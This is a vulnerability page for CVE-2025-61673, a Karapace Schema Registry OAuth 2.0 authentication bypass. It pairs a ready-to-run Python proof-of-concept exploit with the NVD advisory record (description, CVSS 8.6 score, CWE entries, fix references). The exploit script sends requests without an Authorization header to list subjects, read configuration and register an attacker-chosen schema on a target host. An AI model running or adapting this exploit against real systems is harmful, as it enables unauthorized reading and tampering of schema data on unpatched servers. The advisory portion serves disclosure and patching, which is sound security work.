CVE-2025-61673

#!/usr/bin/env python3 # CVE-2025-61673 - Karapace OAuth 2.0 Authentication Bypass PoC # This PoC demonstrates the authentication bypass by sending requests # WITHOUT an Authorization header to protected Schema Registry endpoints. import requests import json # Target Karapace Schema Registry endpoint TARGET_URL = "http://target-karapace-host:8081" def exploit_read_subjects(): """ Bypass OAuth authentication by omitting the Authorization header. The server skips token validation entirely when no header is present. """ # Note: No Authorization header is sent - this triggers the bypass response = requests.get(f"{TARGET_URL}/subjects") if response.status_code == 200: print("[+] Authentication bypassed successfully!") print(f"[+] Retrieved subjects: {response.json()}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False def exploit_read_config(subject): """ Read global or subject-level configuration without authentication. """ response = requests.get(f"{TARGET_URL}/config/{subject}") if response.status_code == 200: print(f"[+] Config for {subject}: {response.json()}") return response.json() return None def exploit_register_schema(subject, schema): """ Register a malicious schema without authentication. """ payload = {"schema": json.dumps(schema)} headers = {"Content-Type": "application/vnd.schemaregistry.v1+json"} # No Authorization header - bypasses OAuth validation response = requests.post( f"{TARGET_URL}/subjects/{subject}/versions", headers=headers, data=json.dumps(payload) ) if response.status_code == 200: print(f"[+] Schema registered: {response.json()}") return True return False if __name__ == "__main__": print("[*] CVE-2025-61673 - Karapace OAuth Bypass PoC") print("[*] Targeting:", TARGET_URL) print() # Step 1: List all subjects (unauthorized read) exploit_read_subjects() # Step 2: Read configuration exploit_read_config("test-subject") # Step 3: Register arbitrary schema (unauthorized write) malicious_schema = { "type": "record", "name": "MaliciousRecord", "fields": [{"name": "data", "type": "string"}] } exploit_register_schema("attacker-subject", malicious_schema)

{"cve": {"id": "CVE-2025-61673", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:32.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Karapace is an open-source implementation of Kafka REST and Schema Registry. Versions 5.0.0 and 5.0.1 contain an authentication bypass vulnerability when configured to use OAuth 2.0 Bearer Token authentication. If a request is sent without an Authorization header, the token validation logic is skipped entirely, allowing an unauthenticated user to read and write to Schema Registry endpoints that should otherwise be protected. This effectively renders the OAuth authentication mechanism ineffective. This issue is fixed in version 5.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/Aiven-Open/karapace/pull/1143/commits/c4038e9ce9fa504b433d59ac2944e337292922c7", "source": "[email protected]"}, {"url": "https://github.com/Aiven-Open/karapace/releases/tag/5.0.2", "source": "[email protected]"}, {"url": "https://github.com/Aiven-Open/karapace/security/advisories/GHSA-vq25-vcrw-gj53", "source": "[email protected]"}]}}